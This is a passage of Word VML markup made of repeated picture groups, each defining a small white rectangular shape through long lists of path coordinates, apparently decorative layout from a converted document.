,8593,2795,8593,2795,8593,2795,8593,2794,8593,2794,8593,2793,8593,2793,8593,2793,8593,2792,8593,2792,8593,2791,8593,2790,8593,2790,8593,2789,8593,2789,8593,2788,8593,2787,8593,2787,8593,2786,8593,2785,8593,2784,8593,2783,8593,2783,8593,2782,8593,2781,8593,2780,8593,2779,8593,2778,8593,2777,8593,2776,8593,2775,8593,2774,8593,2773,8593,2772,8593,2770,8593,2769,8593,2768,8593,2767,8593,2765,8593,2764,8593,2763,8593,2761,8593,2760,8593,2758,8593,2757,8593,2755,8593,2753,8593,2752,8593,2750,8593,2748,8593,2747,8593,2745,8593,2743,8593,2741,8593,2739,8593,2737,8593,2735,8593,2733,8593,2731,8593,2729,8593,2727,8593,2725,8593,2723,8593,2720,8593,2718,8593,2716,8593,2713,8593,2711,8593,2708,8593,2706,8593,2703,8593,2700,8593,2698,8593,2695,8593,2692,8593,2689,8593,2686,8593,2683,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8592,2680,8592,2680,8592,2680,8592,2680,8592,2680,8591,2680,8591,2680,8591,2680,8591,2680,8590,2680,8590,2680,8590,2680,8589,2680,8589,2680,8588,2680,8588,2680,8587,2680,8587,2680,8586,2680,8586,2680,8585,2680,8584,2680,8584,2680,8583,2680,8582,2680,8581,2680,8580,2680,8580,2680,8579,2680,8578,2680,8577,2680,8576,2680,8574,2680,8573,2680,8572,2680,8571,2680,8569,2680,8568,2680,8567,2680,8565,2680,8564,2680,8562,2680,8561,2680,8559,2680,8557,2680,8555,2680,8554,2680,8552,2680,8550,2680,8548,2680,8546,2680,8544,2680,8541,2680,8539,2680,8537,2680,8534,2680,8532,2680,8529,2680,8527,2680,8524,2680,8521,2680,8519,2680,8516,2680,8513,2680,8510,2680,8507,2680,8504,2680,8500,2680,8497,2680,8494,2680,8490,2680,8487,2680,8483,2680,8479,2680,8475,2680,8472,2680,8468,2680,8464,2680,8459,2680,8455,2680,8451,2680,8446,2680,8442,2680,8437,2680,8433,2680,8428,2680,8423,2680,8418,2680,8413,2680,8408,2680,8403,2680,8397,2680,8392,2680,8386,2680,8381,2680,8375,2680,8369,2680,8363,2680,8357,2680,8351,2680,8345,2680,8338e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:447.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,8950" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:8950;width:130;height:270" coordorigin="2670,8950" coordsize="130,270" path="m2680,8969l2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2682,8969,2682,8969,2682,8969,2682,8969,2682,8969,2682,8969,2683,8969,2683,8969,2683,8969,2683,8969,2684,8969,2684,8969,2684,8969,2685,8969,2685,8969,2685,8969,2686,8969,2686,8969,2686,8969,2687,8969,2687,8969,2688,8969,2688,8969,2689,8969,2689,8969,2690,8969,2690,8969,2691,8969,2692,8969,2692,8969,2693,8969,2694,8969,2694,8969,2695,8969,2696,8969,2697,8969,2697,8969,2698,8969,2699,8969,2700,8969,2701,8969,2702,8969,2703,8969,2704,8969,2705,8969,2706,8969,2707,8969,2708,8969,2709,8969,2710,8969,2712,8969,2713,8969,2714,8969,2715,8969,2717,8969,2718,8969,2720,8969,2721,8969,2723,8969,2724,8969,2726,8969,2727,8969,2729,8969,2731,8969,2732,8969,2734,8969,2736,8969,2738,8969,2740,8969,2741,8969,2743,8969,2745,8969,2747,8969,2749,8969,2752,8969,2754,8969,2756,8969,2758,8969,2760,8969,2763,8969,2765,8969,2768,8969,2770,8969,2773,8969,2775,8969,2778,8969,2780,8969,2783,8969,2786,8969,2789,8969,2792,8969,2794,8969,2797,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8970,2800,8970,2800,8970,2800,8970,2800,8970,2800,8971,2800,8971,2800,8971,2800,8971,2800,8972,2800,8972,2800,8973,2800,8973,2800,8973,2800,8974,2800,8974,2800,8975,2800,8976,2800,8976,2800,8977,2800,8977,2800,8978,2800,8979,2800,8980,2800,8981,2800,8981,2800,8982,2800,8983,2800,8984,2800,8985,2800,8986,2800,8987,2800,8989,2800,8990,2800,8991,2800,8992,2800,8994,2800,8995,2800,8997,2800,8998,2800,9000,2800,9001,2800,9003,2800,9005,2800,9006,2800,9008,2800,9010,2800,9012,2800,9014,2800,9016,2800,9018,2800,9020,2800,9023,2800,9025,2800,9027,2800,9030,2800,9032,2800,9035,2800,9038,2800,9040,2800,9043,2800,9046,2800,9049,2800,9052,2800,9055,2800,9058,2800,9061,2800,9065,2800,9068,2800,9072,2800,9075,2800,9079,2800,9083,2800,9086,2800,9090,2800,9094,2800,9098,2800,9102,2800,9107,2800,9111,2800,9115,2800,9120,2800,9125,2800,9129,2800,9134,2800,9139,2800,9144,2800,9149,2800,9154,2800,9159,2800,9165,2800,9170,2800,9176,2800,9181,2800,9187,2800,9193,2800,9199,2800,9205,2800,9211,2800,9217,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2799,9224,2799,9224,2799,9224,2799,9224,2799,9224,2799,9224,2798,9224,2798,9224,2798,9224,2798,9224,2798,9224,2797,9224,2797,9224,2797,9224,2797,9224,2796,9224,2796,9224,2795,9224,2795,9224,2795,9224,2794,9224,2794,9224,2793,9224,2793,9224,2793,9224,2792,9224,2792,9224,2791,9224,2790,9224,2790,9224,2789,9224,2789,9224,2788,9224,2787,9224,2787,9224,2786,9224,2785,9224,2784,9224,2783,9224,2783,9224,2782,9224,2781,9224,2780,9224,2779,9224,2778,9224,2777,9224,2776,9224,2775,9224,2774,9224,2773,9224,2772,9224,2770,9224,2769,9224,2768,9224,2767,9224,2765,9224,2764,9224,2763,9224,2761,9224,2760,9224,2758,9224,2757,9224,2755,9224,2753,9224,2752,9224,2750,9224,2748,9224,2747,9224,2745,9224,2743,9224,2741,9224,2739,9224,2737,9224,2735,9224,2733,9224,2731,9224,2729,9224,2727,9224,2725,9224,2723,9224,2720,9224,2718,9224,2716,9224,2713,9224,2711,9224,2708,9224,2706,9224,2703,9224,2700,9224,2698,9224,2695,9224,2692,9224,2689,9224,2686,9224,2683,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9222,2680,9222,2680,9222,2680,9222,2680,9222,2680,9221,2680,9221,2680,9221,2680,9220,2680,9220,2680,9220,2680,9219,2680,9219,2680,9218,2680,9218,2680,9217,2680,9217,2680,9216,2680,9215,2680,9215,2680,9214,2680,9213,2680,9212,2680,9212,2680,9211,2680,9210,2680,9209,2680,9208,2680,9207,2680,9206,2680,9205,2680,9204,2680,9202,2680,9201,2680,9200,2680,9198,2680,9197,2680,9196,2680,9194,2680,9193,2680,9191,2680,9189,2680,9188,2680,9186,2680,9184,2680,9182,2680,9180,2680,9178,2680,9176,2680,9174,2680,9172,2680,9169,2680,9167,2680,9165,2680,9162,2680,9160,2680,9157,2680,9155,2680,9152,2680,9149,2680,9146,2680,9143,2680,9140,2680,9137,2680,9134,2680,9131,2680,9127,2680,9124,2680,9120,2680,9117,2680,9113,2680,9110,2680,9106,2680,9102,2680,9098,2680,9094,2680,9090,2680,9085,2680,9081,2680,9077,2680,9072,2680,9068,2680,9063,2680,9058,2680,9053,2680,9048,2680,9043,2680,9038,2680,9033,2680,9028,2680,9022,2680,9017,2680,9011,2680,9005,2680,8999,2680,8993,2680,8987,2680,8981,2680,8975,2680,8969e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:479.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,9590" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:9590;width:130;height:270" coordorigin="2670,9590" coordsize="130,270" path="m2680,9614l2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2682,9614,2682,9614,2682,9614,2682,9614,2682,9614,2682,9614,2683,9614,2683,9614,2683,9614,2683,9614,2684,9614,2684,9614,2684,9614,2685,9614,2685,9614,2685,9614,2686,9614,2686,9614,2686,9614,2687,9614,2687,9614,2688,9614,2688,9614,2689,9614,2689,9614,2690,9614,2690,9614,2691,9614,2692,9614,2692,9614,2693,9614,2694,9614,2694,9614,2695,9614,2696,9614,2697,9614,2697,9614,2698,9614,2699,9614,2700,9614,2701,9614,2702,9614,2703,9614,2704,9614,2705,9614,2706,9614,2707,9614,2708,9614,2709,9614,2710,9614,2712,9614,2713,9614,2714,9614,2715,9614,2717,9614,2718,9614,2720,9614,2721,9614,2723,9614,2724,9614,2726,9614,2727,9614,2729,9614,2731,9614,2732,9614,2734,9614,2736,9614,2738,9614,2740,9614,2741,9614,2743,9614,2745,9614,2747,9614,2749,9614,2752,9614,2754,9614,2756,9614,2758,9614,2760,9614,2763,9614,2765,9614,2768,9614,2770,9614,2773,9614,2775,9614,2778,9614,2780,9614,2783,9614,2786,9614,2789,9614,2792,9614,2794,9614,2797,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9615,2800,9615,2800,9615,2800,9615,2800,9615,2800,9615,2800,9616,2800,9616,2800,9616,2800,9617,2800,9617,2800,9617,2800,9618,2800,9618,2800,9618,2800,9619,2800,9619,2800,9620,2800,9620,2800,9621,2800,9622,2800,9622,2800,9623,2800,9624,2800,9624,2800,9625,2800,9626,2800,9627,2800,9628,2800,9629,2800,9630,2800,9631,2800,9632,2800,9633,2800,9634,2800,9635,2800,9636,2800,9638,2800,9639,2800,9640,2800,9642,2800,9643,2800,9645,2800,9647,2800,9648,2800,9650,2800,9652,2800,9654,2800,9655,2800,9657,2800,9659,2800,9661,2800,9664,2800,9666,2800,9668,2800,9670,2800,9673,2800,9675,2800,9678,2800,9680,2800,9683,2800,9686,2800,9688,2800,9691,2800,9694,2800,9697,2800,9700,2800,9704,2800,9707,2800,9710,2800,9714,2800,9717,2800,9721,2800,9724,2800,9728,2800,9732,2800,9736,2800,9740,2800,9744,2800,9748,2800,9752,2800,9756,2800,9761,2800,9765,2800,9770,2800,9775,2800,9779,2800,9784,2800,9789,2800,9794,2800,9799,2800,9805,2800,9810,2800,9815,2800,9821,2800,9827,2800,9832,2800,9838,2800,9844,2800,9850,2800,9856,2800,9863,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2799,9869,2799,9869,2799,9869,2799,9869,2799,9869,2799,9869,2798,9869,2798,9869,2798,9869,2798,9869,2798,9869,2797,9869,2797,9869,2797,9869,2797,9869,2796,9869,2796,9869,2795,9869,2795,9869,2795,9869,2794,9869,2794,9869,2793,9869,2793,9869,2793,9869,2792,9869,2792,9869,2791,9869,2790,9869,2790,9869,2789,9869,2789,9869,2788,9869,2787,9869,2787,9869,2786,9869,2785,9869,2784,9869,2783,9869,2783,9869,2782,9869,2781,9869,2780,9869,2779,9869,2778,9869,2777,9869,2776,9869,2775,9869,2774,9869,2773,9869,2772,9869,2770,9869,2769,9869,2768,9869,2767,9869,2765,9869,2764,9869,2763,9869,2761,9869,2760,9869,2758,9869,2757,9869,2755,9869,2753,9869,2752,9869,2750,9869,2748,9869,2747,9869,2745,9869,2743,9869,2741,9869,2739,9869,2737,9869,2735,9869,2733,9869,2731,9869,2729,9869,2727,9869,2725,9869,2723,9869,2720,9869,2718,9869,2716,9869,2713,9869,2711,9869,2708,9869,2706,9869,2703,9869,2700,9869,2698,9869,2695,9869,2692,9869,2689,9869,2686,9869,2683,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9867,2680,9867,2680,9867,2680,9867,2680,9866,2680,9866,2680,9866,2680,9865,2680,9865,2680,9864,2680,9864,2680,9864,2680,9863,2680,9862,2680,9862,2680,9861,2680,9861,2680,9860,2680,9859,2680,9859,2680,9858,2680,9857,2680,9856,2680,9855,2680,9854,2680,9853,2680,9852,2680,9851,2680,9850,2680,9849,2680,9848,2680,9846,2680,9845,2680,9844,2680,9842,2680,9841,2680,9839,2680,9838,2680,9836,2680,9835,2680,9833,2680,9831,2680,9829,2680,9827,2680,9825,2680,9823,2680,9821,2680,9819,2680,9817,2680,9815,2680,9812,2680,9810,2680,9808,2680,9805,2680,9803,2680,9800,2680,9797,2680,9794,2680,9791,2680,9789,2680,9785,2680,9782,2680,9779,2680,9776,2680,9773,2680,9769,2680,9766,2680,9762,2680,9759,2680,9755,2680,9751,2680,9747,2680,9743,2680,9739,2680,9735,2680,9731,2680,9726,2680,9722,2680,9718,2680,9713,2680,9708,2680,9704,2680,9699,2680,9694,2680,9689,2680,9684,2680,9678,2680,9673,2680,9667,2680,9662,2680,9656,2680,9651,2680,9645,2680,9639,2680,9633,2680,9626,2680,9620,2680,9614e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:511.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,10230" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:10230;width:130;height:250" coordorigin="2670,10230" coordsize="130,250" path="m2680,10244l2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2682,10244,2682,10244,2682,10244,2682,10244,2682,10244,2682,10244,2683,10244,2683,10244,2683,10244,2683,10244,2684,10244,2684,10244,2684,10244,2685,10244,2685,10244,2685,10244,2686,10244,2686,10244,2686,10244,2687,10244,2687,10244,2688,10244,2688,10244,2689,10244,2689,10244,2690,10244,2690,10244,2691,10244,2692,10244,2692,10244,2693,10244,2694,10244,2694,10244,2695,10244,2696,10244,2697,10244,2697,10244,2698,10244,2699,10244,2700,10244,2701,10244,2702,10244,2703,10244,2704,10244,2705,10244,2706,10244,2707,10244,2708,10244,2709,10244,2710,10244,2712,10244,2713,10244,2714,10244,2715,10244,2717,10244,2718,10244,2720,10244,2721,10244,2723,10244,2724,10244,2726,10244,2727,10244,2729,10244,2731,10244,2732,10244,2734,10244,2736,10244,2738,10244,2740,10244,2741,10244,2743,10244,2745,10244,2747,10244,2749,10244,2752,10244,2754,10244,2756,10244,2758,10244,2760,10244,2763,10244,2765,10244,2768,10244,2770,10244,2773,10244,2775,10244,2778,10244,2780,10244,2783,10244,2786,10244,2789,10244,2792,10244,2794,10244,2797,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10245,2800,10245,2800,10245,2800,10245,2800,10245,2800,10245,2800,10245,2800,10246,2800,10246,2800,10246,2800,10246,2800,10247,2800,10247,2800,10247,2800,10247,2800,10248,2800,10248,2800,10249,2800,10249,2800,10250,2800,10250,2800,10251,2800,10251,2800,10252,2800,10252,2800,10253,2800,10254,2800,10255,2800,10255,2800,10256,2800,10257,2800,10258,2800,10259,2800,10260,2800,10261,2800,10262,2800,10263,2800,10264,2800,10265,2800,10267,2800,10268,2800,10269,2800,10271,2800,10272,2800,10274,2800,10275,2800,10277,2800,10279,2800,10280,2800,10282,2800,10284,2800,10286,2800,10288,2800,10290,2800,10292,2800,10294,2800,10296,2800,10298,2800,10301,2800,10303,2800,10306,2800,10308,2800,10311,2800,10313,2800,10316,2800,10319,2800,10322,2800,10325,2800,10328,2800,10331,2800,10334,2800,10337,2800,10340,2800,10344,2800,10347,2800,10351,2800,10355,2800,10358,2800,10362,2800,10366,2800,10370,2800,10374,2800,10378,2800,10382,2800,10387,2800,10391,2800,10396,2800,10400,2800,10405,2800,10410,2800,10414,2800,10419,2800,10424,2800,10430,2800,10435,2800,10440,2800,10446,2800,10451,2800,10457,2800,10463,2800,10468,2800,10474,2800,10480,2800,10487,2800,10493,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2799,10499,2799,10499,2799,10499,2799,10499,2799,10499,2799,10499,2798,10499,2798,10499,2798,10499,2798,10499,2798,10499,2797,10499,2797,10499,2797,10499,2797,10499,2796,10499,2796,10499,2795,10499,2795,10499,2795,10499,2794,10499,2794,10499,2793,10499,2793,10499,2793,10499,2792,10499,2792,10499,2791,10499,2790,10499,2790,10499,2789,10499,2789,10499,2788,10499,2787,10499,2787,10499,2786,10499,2785,10499,2784,10499,2783,10499,2783,10499,2782,10499,2781,10499,2780,10499,2779,10499,2778,10499,2777,10499,2776,10499,2775,10499,2774,10499,2773,10499,2772,10499,2770,10499,2769,10499,2768,10499,2767,10499,2765,10499,2764,10499,2763,10499,2761,10499,2760,10499,2758,10499,2757,10499,2755,10499,2753,10499,2752,10499,2750,10499,2748,10499,2747,10499,2745,10499,2743,10499,2741,10499,2739,10499,2737,10499,2735,10499,2733,10499,2731,10499,2729,10499,2727,10499,2725,10499,2723,10499,2720,10499,2718,10499,2716,10499,2713,10499,2711,10499,2708,10499,2706,10499,2703,10499,2700,10499,2698,10499,2695,10499,2692,10499,2689,10499,2686,10499,2683,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10498,2680,10498,2680,10498,2680,10498,2680,10498,2680,10497,2680,10497,2680,10497,2680,10497,2680,10496,2680,10496,2680,10496,2680,10495,2680,10495,2680,10494,2680,10494,2680,10493,2680,10493,2680,10492,2680,10492,2680,10491,2680,10490,2680,10490,2680,10489,2680,10488,2680,10487,2680,10486,2680,10485,2680,10485,2680,10484,2680,10483,2680,10481,2680,10480,2680,10479,2680,10478,2680,10477,2680,10475,2680,10474,2680,10473,2680,10471,2680,10470,2680,10468,2680,10467,2680,10465,2680,10463,2680,10461,2680,10460,2680,10458,2680,10456,2680,10454,2680,10452,2680,10450,2680,10447,2680,10445,2680,10443,2680,10440,2680,10438,2680,10435,2680,10433,2680,10430,2680,10427,2680,10425,2680,10422,2680,10419,2680,10416,2680,10413,2680,10410,2680,10406,2680,10403,2680,10400,2680,10396,2680,10393,2680,10389,2680,10385,2680,10381,2680,10378,2680,10374,2680,10369,2680,10365,2680,10361,2680,10357,2680,10352,2680,10348,2680,10343,2680,10339,2680,10334,2680,10329,2680,10324,2680,10319,2680,10314,2680,10309,2680,10303,2680,10298,2680,10292,2680,10287,2680,10281,2680,10275,2680,10269,2680,10263,2680,10257,2680,10251,2680,10244e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:543.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,10870" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:10870;width:130;height:270" coordorigin="2670,10870" coordsize="130,270" path="m2680,10889l2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2682,10889,2682,10889,2682,10889,2682,10889,2682,10889,2682,10889,2683,10889,2683,10889,2683,10889,2683,10889,2684,10889,2684,10889,2684,10889,2685,10889,2685,10889,2685,10889,2686,10889,2686,10889,2686,10889,2687,10889,2687,10889,2688,10889,2688,10889,2689,10889,2689,10889,2690,10889,2690,10889,2691,10889,2692,10889,2692,10889,2693,10889,2694,10889,2694,10889,2695,10889,2696,10889,2697,10889,2697,10889,2698,10889,2699,10889,2700,10889,2701,10889,2702,10889,2703,10889,2704,10889,2705,10889,2706,10889,2707,10889,2708,10889,2709,10889,2710,10889,2712,10889,2713,10889,2714,10889,2715,10889,2717,10889,2718,10889,2720,10889,2721,10889,2723,10889,2724,10889,2726,10889,2727,10889,2729,10889,2731,10889,2732,10889,2734,10889,2736,10889,2738,10889,2740,10889,2741,10889,2743,10889,2745,10889,2747,10889,2749,10889,2752,10889,2754,10889,2756,10889,2758,10889,2760,10889,2763,10889,2765,10889,2768,10889,2770,10889,2773,10889,2775,10889,2778,10889,2780,10889,2783,10889,2786,10889,2789,10889,2792,10889,2794,10889,2797,10889,2800,10889,2800,10889,2800,10889,2800,10889,2800,10889,2800,10889,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10891,2800,10891,2800,10891,2800,10891,2800,10891,2800,10892,2800,10892,2800,10892,2800,10892,2800,10893,2800,10893,2800,10894,2800,10894,2800,10894,2800,10895,2800,10895,2800,10896,2800,10897,2800,10897,2800,10898,2800,10898,2800,10899,2800,10900,2800,10901,2800,10902,2800,10902,2800,10903,2800,10904,2800,10905,2800,10906,2800,10907,2800,10908,2800,10910,2800,10911,2800,10912,2800,10913,2800,10915,2800,10916,2800,10918,2800,10919,2800,10921,2800,10922,2800,10924,2800,10926,2800,10927,2800,10929,2800,10931,2800,10933,2800,10935,2800,10937,2800,10939,2800,10941,2800,10944,2800,10946,2800,10948,2800,10951,2800,10953,2800,10956,2800,10959,2800,10961,2800,10964,2800,10967,2800,10970,2800,10973,2800,10976,2800,10979,2800,10982,2800,10986,2800,10989,2800,10993,2800,10996,2800,11000,2800,11004,2800,11007,2800,11011,2800,11015,2800,11019,2800,11023,2800,11028,2800,11032,2800,11036,2800,11041,2800,11045,2800,11050,2800,11055,2800,11060,2800,11065,2800,11070,2800,11075,2800,11080,2800,11086,2800,11091,2800,11097,2800,11102,2800,11108,2800,11114,2800,11120,2800,11126,2800,11132,2800,11138,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2799,11145,2799,11145,2799,11145,2799,11145,2799,11145,2799,11145,2798,11145,2798,11145,2798,11145,2798,11145,2798,11145,2797,11145,2797,11145,2797,11145,2797,11145,2796,11145,2796,11145,2795,11145,2795,11145,2795,11145,2794,11145,2794,11145,2793,11145,2793,11145,2793,11145,2792,11145,2792,11145,2791,11145,2790,11145,2790,11145,2789,11145,2789,11145,2788,11145,2787,11145,2787,11145,2786,11145,2785,11145,2784,11145,2783,11145,2783,11145,2782,11145,2781,11145,2780,11145,2779,11145,2778,11145,2777,11145,2776,11145,2775,11145,2774,11145,2773,11145,2772,11145,2770,11145,2769,11145,2768,11145,2767,11145,2765,11145,2764,11145,2763,11145,2761,11145,2760,11145,2758,11145,2757,11145,2755,11145,2753,11145,2752,11145,2750,11145,2748,11145,2747,11145,2745,11145,2743,11145,2741,11145,2739,11145,2737,11145,2735,11145,2733,11145,2731,11145,2729,11145,2727,11145,2725,11145,2723,11145,2720,11145,2718,11145,2716,11145,2713,11145,2711,11145,2708,11145,2706,11145,2703,11145,2700,11145,2698,11145,2695,11145,2692,11145,2689,11145,2686,11145,2683,11145,2680,11145,2680,11145,2680,11145,2680,11145,2680,11145,2680,11145,2680,11145,2680,11145,2680,11145,2680,11145,2680,11145,2680,11144,2680,11144,2680,11144,2680,11144,2680,11144,2680,11144,2680,11144,2680,11144,2680,11144,2680,11144,2680,11143,2680,11143,2680,11143,2680,11143,2680,11143,2680,11142,2680,11142,2680,11142,2680,11141,2680,11141,2680,11141,2680,11140,2680,11140,2680,11139,2680,11139,2680,11138,2680,11138,2680,11137,2680,11136,2680,11136,2680,11135,2680,11134,2680,11133,2680,11133,2680,11132,2680,11131,2680,11130,2680,11129,2680,11128,2680,11127,2680,11126,2680,11125,2680,11123,2680,11122,2680,11121,2680,11119,2680,11118,2680,11117,2680,11115,2680,11114,2680,11112,2680,11110,2680,11109,2680,11107,2680,11105,2680,11103,2680,11101,2680,11099,2680,11097,2680,11095,2680,11093,2680,11090,2680,11088,2680,11086,2680,11083,2680,11081,2680,11078,2680,11075,2680,11073,2680,11070,2680,11067,2680,11064,2680,11061,2680,11058,2680,11055,2680,11052,2680,11048,2680,11045,2680,11041,2680,11038,2680,11034,2680,11031,2680,11027,2680,11023,2680,11019,2680,11015,2680,11011,2680,11006,2680,11002,2680,10998,2680,10993,2680,10989,2680,10984,2680,10979,2680,10974,2680,10969,2680,10964,2680,10959,2680,10954,2680,10949,2680,10943,2680,10938,2680,10932,2680,10926,2680,10920,2680,10914,2680,10908,2680,10902,2680,10896,2680,10889e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:575.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,11510" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:11510;width:130;height:250" coordorigin="2670,11510" coordsize="130,250" path="m2680,11520l2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2682,11520,2682,11520,2682,11520,2682,11520,2682,11520,2682,11520,2683,11520,2683,11520,2683,11520,2683,11520,2684,11520,2684,11520,2684,11520,2685,11520,2685,11520,2685,11520,2686,11520,2686,11520,2686,11520,2687,11520,2687,11520,2688,11520,2688,11520,2689,11520,2689,11520,2690,11520,2690,11520,2691,11520,2692,11520,2692,11520,2693,11520,2694,11520,2694,11520,2695,11520,2696,11520,2697,11520,2697,11520,2698,11520,2699,11520,2700,11520,2701,11520,2702,11520,2703,11520,2704,11520,2705,11520,2706,11520,2707,11520,2708,11520,2709,11520,2710,11520,2712,11520,2713,11520,2714,11520,2715,11520,2717,11520,2718,11520,2720,11520,2721,11520,2723,11520,2724,11520,2726,11520,2727,11520,2729,11520,2731,11520,2732,11520,2734,11520,2736,11520,2738,11520,2740,11520,2741,11520,2743,11520,2745,11520,2747,11520,2749,11520,2752,11520,2754,11520,2756,11520,2758,11520,2760,11520,2763,11520,2765,11520,2768,11520,2770,11520,2773,11520,2775,11520,2778,11520,2780,11520,2783,11520,2786,11520,2789,11520,2792,11520,2794,11520,2797,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11521,2800,11521,2800,11521,2800,11521,2800,11521,2800,11521,2800,11522,2800,11522,2800,11522,2800,11522,2800,11523,2800,11523,2800,11523,2800,11524,2800,11524,2800,11525,2800,11525,2800,11526,2800,11526,2800,11527,2800,11527,2800,11528,2800,11529,2800,11529,2800,11530,2800,11531,2800,11532,2800,11533,2800,11534,2800,11535,2800,11536,2800,11537,2800,11538,2800,11539,2800,11540,2800,11541,2800,11542,2800,11544,2800,11545,2800,11546,2800,11548,2800,11549,2800,11551,2800,11553,2800,11554,